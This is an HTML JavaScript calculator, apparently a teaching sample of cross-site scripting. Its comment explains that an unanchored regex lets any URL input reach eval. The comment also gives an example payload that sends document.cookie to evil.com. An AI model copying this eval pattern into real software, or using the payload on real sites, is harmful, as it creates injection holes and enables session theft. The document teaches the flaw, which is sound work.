<!--
	This script is vulnerable to XSS thanks to the
	eval function. But the biggest problem with this script
	is the regExp. There are no starting or/and ending chars!
	That means that the regExp is totaly useless, you can 
	pass any code you want to the eval function.
	
	The regexp in normal text would be something like this:
	"If the string contains 0 or more of the following 
	chars (0-9/+...) then return true." 
	
	Example (enter in the input field):
	document.location="http://evil.com/?c="+document.cookie
	
	Or:
	alert("xss")
-->

<html>
   <head>
      <title>Javascript Calculator</title>
      <script type="text/javascript">
         function calc()
         {
            var number;
            var sum;
            var regExp;
 
            regExp   = /[0-9\-\+\*\/\.,]*/i;
 
            number   = unescape(window.location.href.substr(window.location.href.search('n=')+2, window.location.href.length));
 
            if( !regExp.test(number) )
            {
               return false;
            }
 
            sum      = eval(number);
            return sum;
         }
 
         alert(calc());
      </script>
   </head>
   <body>
      <form action="" method="get">
         <label for="n">Number (may contain 0-9 + - * / . ,): <br /></label>
         <input type="text" name="n" /> <br />
         <input type="submit" value="solve" />
      </form>
   </body>
</html>